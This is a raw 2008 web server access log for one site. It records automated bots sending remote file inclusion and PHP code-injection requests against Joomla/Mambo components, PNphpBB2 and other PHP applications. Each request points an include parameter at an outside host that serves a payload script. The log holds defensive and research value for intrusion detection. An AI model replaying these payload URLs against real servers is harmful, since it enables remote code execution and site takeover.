62.26.219.83 - - [19/Jul/2008:11:37:42 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:37:57 -0700] "GET /logs/access_080315.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:37:59 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:38:00 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [19/Jul/2008:11:38:05 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 200 18513 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:38:11 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:38:12 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.lisey.ca/sohoadmin/safe.txt? HTTP/1.1" 200 18481 "-" "libwww-perl/5.65" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:38:13 -0700] "GET /logs/access_080324.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:15 -0700] "GET /logs/access_071224.log/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:16 -0700] "GET /index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:16 -0700] "GET /logs/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:17 -0700] "GET /logs/access_071224.log/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:18 -0700] "GET /index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 200 18429 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:38:18 -0700] "GET /logs/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.65.34.76 - - [19/Jul/2008:11:38:25 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://totalhardware.co.uk/mambots/.inuse/id.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.803" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:38:30 -0700] "GET /logs/access_080325.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.75.110 - - [19/Jul/2008:11:38:34 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/format.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.75.110 - - [19/Jul/2008:11:38:36 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/format.txt?? HTTP/1.1" 200 18581 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.82.96 - - [19/Jul/2008:11:38:39 -0700] "GET /index.php?DOCUMENT_ROOT=http://mobad.de/id.jpg?? HTTP/1.1" 200 18385 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.82.96 - - [19/Jul/2008:11:38:39 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://mobad.de/id.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.117.237.200 - - [19/Jul/2008:11:38:42 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.proostjes.be/calendar/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.28.93 - - [19/Jul/2008:11:38:43 -0700] "GET /logs/access.log/index.php?DOCUMENT_ROOT=http://micro101.com/xcart/skin1/file? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.28.93 - - [19/Jul/2008:11:38:43 -0700] "GET /logs/index.php?DOCUMENT_ROOT=http://micro101.com/xcart/skin1/file? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.201.8.9 - - [19/Jul/2008:11:38:47 -0700] "GET /logs/access_071109.log/administrator/components/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:39:14 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:39:16 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:39:16 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18473 "-" "libwww-perl/5.50" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:39:17 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.213.245.1 - - [19/Jul/2008:11:39:17 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.lisey.ca/sohoadmin/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:39:30 -0700] "GET /logs/access_080129.log/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
66.45.243.210 - - [19/Jul/2008:11:39:31 -0700] "GET /logs/access_080129.log/index.php?pageurl=http://www.iglesialcs.cl/newweb/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:39:31 -0700] "GET /logs/access_080331.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [19/Jul/2008:11:39:39 -0700] "GET /logs/access.log/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [19/Jul/2008:11:39:40 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [19/Jul/2008:11:39:40 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:39:52 -0700] "GET /logs/access_080513.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [19/Jul/2008:11:39:56 -0700] "GET /logs/access_071109.log/administrator/components/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:40:05 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:40:06 -0700] "GET /logs/access_080528.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.125.211.84 - - [19/Jul/2008:11:40:07 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://yayang.co.uk/ml/id.txt?? HTTP/1.1" 200 18499 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:40:07 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 200 18481 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
205.134.225.114 - - [19/Jul/2008:11:40:14 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
205.134.225.114 - - [19/Jul/2008:11:40:15 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.hotlinkfiles.com/files/1605016_lfsly/id4.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:41:19 -0700] "GET /logs/access_080321.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:41:27 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:41:46 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:41:47 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.22.69.36 - - [19/Jul/2008:11:41:51 -0700] "GET /logs/access_080418.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:41:53 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 200 18481 "-" "libwww-perl/5.813" "www.dmulk.com"
69.64.80.225 - - [19/Jul/2008:11:41:53 -0700] "GET /logs/access_080313.log%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.teamfatalz.com/rfi/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:41:59 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:42:01 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 200 18481 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [19/Jul/2008:11:42:02 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://rom.as.ro/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:42:04 -0700] "GET /logs/access.log//include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:42:04 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.106 - - [19/Jul/2008:11:42:05 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.h2u.nl//langs/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [19/Jul/2008:11:42:15 -0700] "GET /logs/access.log/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.almacenes-si2.com/portal/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [19/Jul/2008:11:42:16 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.almacenes-si2.com/portal/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [19/Jul/2008:11:42:16 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.almacenes-si2.com/portal/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.75.110 - - [19/Jul/2008:11:42:21 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/format.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:42:45 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:44:02 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:44:04 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 200 18487 "-" "libwww-perl/5.79" "www.dmulk.com"
222.73.48.200 - - [19/Jul/2008:11:44:05 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.75.110 - - [19/Jul/2008:11:44:12 -0700] "GET /logs/access.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.m-comp.nl/oscommerce/catalog/includes/local/format.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:44:18 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:44:18 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:44:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.157.209.164 - - [19/Jul/2008:11:44:19 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:45:16 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:45:18 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.139.226 - - [19/Jul/2008:11:45:36 -0700] "GET /logs/access_080318.log/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.gestward.pt/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:45:38 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:11:45:50 -0700] "GET /logs/index.php?configFile=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
194.85.80.86 - - [19/Jul/2008:11:45:51 -0700] "GET /index.php?configFile=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 200 18475 "-" "libwww-perl/5.63" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:45:52 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:45:53 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18477 "-" "libwww-perl/5.50" "www.dmulk.com"
193.109.80.8 - - [19/Jul/2008:11:46:06 -0700] "GET /logs/access_080528.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/fjr1938/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.26.219.83 - - [19/Jul/2008:11:46:10 -0700] "GET /logs/access_080315.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.mojir.com/el/moodledata/site/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [19/Jul/2008:11:46:17 -0700] "GET /logs/access_080221.log/index.php3?act=http://alternate-zone.com/themes/Sage/lightbox/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.57.211 - - [19/Jul/2008:11:46:20 -0700] "GET /logs/access_080313.log/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [19/Jul/2008:11:46:20 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [19/Jul/2008:11:46:21 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.57.211 - - [19/Jul/2008:11:47:11 -0700] "GET /logs/access_080207.log/errors.php?error=http://neu_2.lasrv-1.de/web/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:47:16 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:47:18 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 200 18455 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:47:20 -0700] "GET /logs/plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [19/Jul/2008:11:47:20 -0700] "GET /plugin.class.php%3Fmosconfig_absolute_path%3D&meta=http://multimusiq.co.uk/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:47:21 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.200.223.106 - - [19/Jul/2008:11:47:22 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 200 18455 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.98.70.18 - - [19/Jul/2008:11:47:29 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [19/Jul/2008:11:47:29 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.hotelberberys.pl/includes/domit/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:11:47:35 -0700] "GET ///plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:11:47:35 -0700] "GET /logs///plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:11:47:35 -0700] "GET /logs/access.log%20///plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:47:39 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
216.193.201.57 - - [19/Jul/2008:11:47:40 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
91.194.90.180 - - [19/Jul/2008:11:47:42 -0700] "GET /logs/access.log///plugins/safehtml/HTMLSax3.php?dir[plugins]=http://ciro1992.org/ciao/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.194.38 - - [19/Jul/2008:11:47:46 -0700] "GET /logs/access_080528.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:48:08 -0700] "GET /logs/access_080313.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:48:11 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 200 18463 "-" "libwww-perl/5.50" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:48:12 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:11:48:43 -0700] "GET /logs/access_080329.log//agendax/addevent.inc.php?agendax_path=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:11:48:43 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.99.164.170 - - [19/Jul/2008:11:48:43 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.pre.com.tw/tmp/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.65.34.76 - - [19/Jul/2008:11:48:46 -0700] "GET /logs/access_080329.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://totalhardware.co.uk/mambots/.inuse/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.65.34.76 - - [19/Jul/2008:11:48:47 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://totalhardware.co.uk/mambots/.inuse/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:49:05 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:49:06 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:49:07 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 18509 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.74.19 - - [19/Jul/2008:11:49:08 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.pasote.net/m_videos/ooid.txt?? HTTP/1.1" 200 18525 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.5.87 - - [19/Jul/2008:11:49:19 -0700] "GET /logs/access.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.blackstock.ca/alb?? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:11:49:39 -0700] "GET /logs/access_080329.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.52.194 - - [19/Jul/2008:11:49:39 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
